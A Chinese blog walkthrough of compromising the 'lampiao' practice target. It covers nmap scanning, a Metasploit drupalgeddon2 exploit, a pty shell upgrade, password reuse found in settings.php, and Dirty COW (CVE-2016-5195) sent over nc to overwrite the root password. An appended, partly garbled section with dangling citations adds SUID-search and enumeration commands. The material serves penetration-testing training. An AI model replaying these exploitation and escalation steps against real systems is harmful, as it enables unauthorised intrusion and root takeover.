lampiao靶场---脏牛提权

本文详细描述了一次渗透测试的过程,从使用KaliLinux的nmap扫描目标机器的开放端口,发现Drupal网站并利用其版本漏洞,到通过脏牛(CVE-2016-5195)提权获得root权限,展示了渗透测试的基本步骤和技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

渗透测试前期准备

攻击机:192.168.71.235(kali系统)

靶机:192.168.71.191

漏洞复现

信息收集

本漏洞需要用到kali自带的Metasploit(简称msf)渗透工具

首先利用kali中的nmap扫描工具扫描目标网站开放的端口

nmap 192.168.71.191 -p 0-65535

发现靶机开放了22 80 和1898端口

首先我们访问80端口发现网站没有任何有用内容,是个空页面。

然后我们访问1898端口,发现网站真正的页面。

随后我们用kali的目录扫描工具扫描了一下目录

在扫描结果里我们发现了robots.txt文件。

  • robots.txt 是一种存放于网站根目录下的文本文件,它通常告诉网络搜索引擎的漫游器(爬虫),此网站中的哪些内容是不应被爬虫获取的,哪些是可以被(爬虫)获取的。(类似于一种君子协议)。

    在渗透测试过程中我们是可以在里面获得一些我们想要的信息的。

    这里我们访问一下这个文件。直接去看Directories(不允许爬虫爬取)的文件。发现了一个叫CHANGELOG.txt的文件。这里感觉大概是一个软件的升级日志。我们直接打开看一下有没有我们需要的信息。

打开文件后发现跟我们猜想的差不多

这里我们信息收集获取到了靶机网站的cms程序,以及版本号。

这里收集到最新的一次更新是 Drupal 7.54 2017-02-01

查找可利用漏洞

接下来我们在kali攻击机中启动msf渗透工具

msfconsole

这里我们利用msf搜索Drupal的可用漏洞

search Drupal

发现还是有很多可利用的漏洞的

这里我们选择exploit/unix/webapp/drupal_drupalgeddon2 然后show options一下查看需要配置的选项

这里我们设置一下靶机的ip以及端口

set rhost 192.168.71.191 set rport 1898

配置完成后输入run开始攻击击不成功的话可以尝试下别的漏洞,我们现在是直接成功进入了。

然后我们利用Python起一个新的交互的shell

代码放在这里了如需 自取(python -c 'import pty;pty.spawn("/bin/bash")')

接下来就是信息收集,我们尽量把每个文件夹都看一下,搜寻我们可利用的信息。这里就不一一演示了

然后在/var/www/html/sites/default下发现了settings.php(配置信息文件)

接着我们查看一下settings.php的信息发现了数据库的配置信息,找到了数据库的密码。

然后我们到home目录下发现靶机只有一个用户tiago。

这里我们用拿到的数据库密码试一下ssh,成功远程登录tiago用户,接下来就是提权了。

脏牛提权

漏洞编号:CVE-2016-5195

漏洞危害:低权限用户利用该漏洞技术可以在全版本linux系统上实现本地提权,获取root权限。

影响范围:Linux内核>=2.6.22(2007年发行)开始受影响,直到2016年10月18日才修复。

先uname -a查看一下版本,发现版本可执行漏洞

然后首先我们需要先把要用到的脏牛提权文件放到kali攻击机里,这里我们先用tar -czvf dcow1.tar.gz CVE-2016-5195-master 压缩一下文件。脏牛提权文件下载链接:百度网盘 请输入提取码 提取码:3389(需要自取)

利用拿到的靶机tiago户监听4444端口。

然后通过kali 的nc发送到靶机。(nc 192.168.71.191 4444 > dcow1.tar.gz)

这边看到靶机已经接收到文件

然后tar -xzvf dcwo1.tar.gz解压得到CVE-2016-master漏洞

然后cd进入 CVE-2016-maste文件夹,查看一下内容。

这个脚本是已经写好的,这里我们只需要make一下就回自动生成dcow文件。然后./dcow执行一下文件就会更改root密码。这里我们看到密码修改成了: dirtyCowFun

然后直接su root 输入密码提权。拿到root权限。

自此,渗透结束,脏牛提权的使用范围还是比较广的,受影响的版本还是比较多的,今天的分享就到这里,谢谢大家。对渗透测试感兴趣的小伙伴可以关注一下作者。后续作者还会继续分享有用的渗透测试知识。点赞关注不迷路。

### UDF的学习与实践 #### 关于UDF的基础概念 用户定义函数(User Defined Function, UDF)是一种允许数据库管理员扩展SQL功能的技术。在MySQL中,通过创建自定义共享库并加载这些库中的函数来实现这一目标。然而,在某些情况下,攻击者可以滥用此机制来进行升操作[^2]。 #### 查找具有Setuid限的文件 对于Linux系统而言,了解如何识别潜在可被利用的二进制程序至关重要。使用`find`命令可以帮助我们定位那些设置了特殊位标记的执行档。具体语法如下所示: ```bash find / -perm -u=s -type f 2>/dev/null ``` #### 枚举工具的应用 当面对复杂的网络环境或者试图评估远程主机的安全状况时,合适的扫描和枚举工具有助于收集必要的信息。例如,`enum4linux-ng`就是一个强大的开源项目,它能够供有关SMB服务配置细节等方面的数据采集能力。安装过程相对简单明了: ```bash sudo apt update sudo apt install enum4linux-ng ``` #### 实战经验分享——Raven2靶机案例分析 在一个名为Raven2的实际演练场景里到过遇到困难的情况:尽管尝试运用现成脚本却未能成功建立反向连接会话;最终采取修改策略即植入简易WebShell至服务器端完成任务目的[^4]。这表明实际应用过程中可能需要灵活调整方法论以适应不同条件下的挑战需求。 #### 推荐学习路径及资源链接 针对希望深入研究该领域的朋友来说,可以从以下几个方面着手准备: - **理论基础**:掌握操作系统原理以及各类漏洞形成原因; - **动手实操**:参与在线虚拟实验室如pWnOS系列供的训练课程[^1]; - **阅读文档**:查阅官方手册或者其他威出版物理解标准做法之外还应关注社区贡献内容比如CTF比赛题目解析材料等参考资料[^9]. 以下是几个值得探索的方向建议供参考考虑:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值